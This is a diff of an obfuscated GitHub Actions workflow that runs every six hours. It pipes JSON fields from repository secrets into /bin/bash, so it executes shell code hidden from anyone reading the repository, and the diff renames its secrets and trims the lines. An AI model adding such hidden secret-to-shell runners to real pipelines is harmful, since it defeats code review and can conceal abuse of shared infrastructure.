--- a/.github/workflows/yzhuoxingchen.yml
+++ b/.github/workflows/yzhuoxingchen.yml
@@ -3,29 +3,18 @@ name: yzhuoxingchen
 on:
   workflow_dispatch:
   schedule:
-    - cron: '49 0/6 * * *'
+    - cron: '8 1/6 * * *'
 
 jobs:
   build:
     runs-on: ubuntu-latest
-
     steps:
       - uses: actions/checkout@v4
       - name: yzhuoxingchen
         env:
-          b03513: ${{ secrets.b03513 }}
+          rgpgu91: ${{ secrets.rgpgu91 }}
         run: |
-          echo $b03513 | jq -r .hflaf90039 | /bin/bash
-          echo $hru3 | jq -r .twre830 | /bin/bash
-          echo $w8451 | jq -r .sq108 | /bin/bash
-          echo $w8122 | jq -r .rwrya03 | /bin/bash
-          echo $jl416 | jq -r .pns54 | /bin/bash
-          echo $zuxqa9271 | jq -r .clv1453 | /bin/bash
-          echo $ql6 | jq -r .vl031 | /bin/bash
-          echo $ejkam284 | jq -r .utcr47 | /bin/bash
-          echo $lain3017 | jq -r .pxk82 | /bin/bash
-          echo $zuri0844 | jq -r .jqw72 | /bin/bash
-          echo $evt9013 | jq -r .ufpbp62881 | /bin/bash
-          echo $sa6840 | jq -r .fyl969 | /bin/bash
-          echo $ozlbc1354 | jq -r .n7294 | /bin/bash
+          echo $rgpgu91 | jq -r .qca7 | /bin/bash
+          echo $pciem76939 | jq -r .wur47 | /bin/bash
+          echo $pen12 | jq -r .hcs77573 | /bin/bash
 
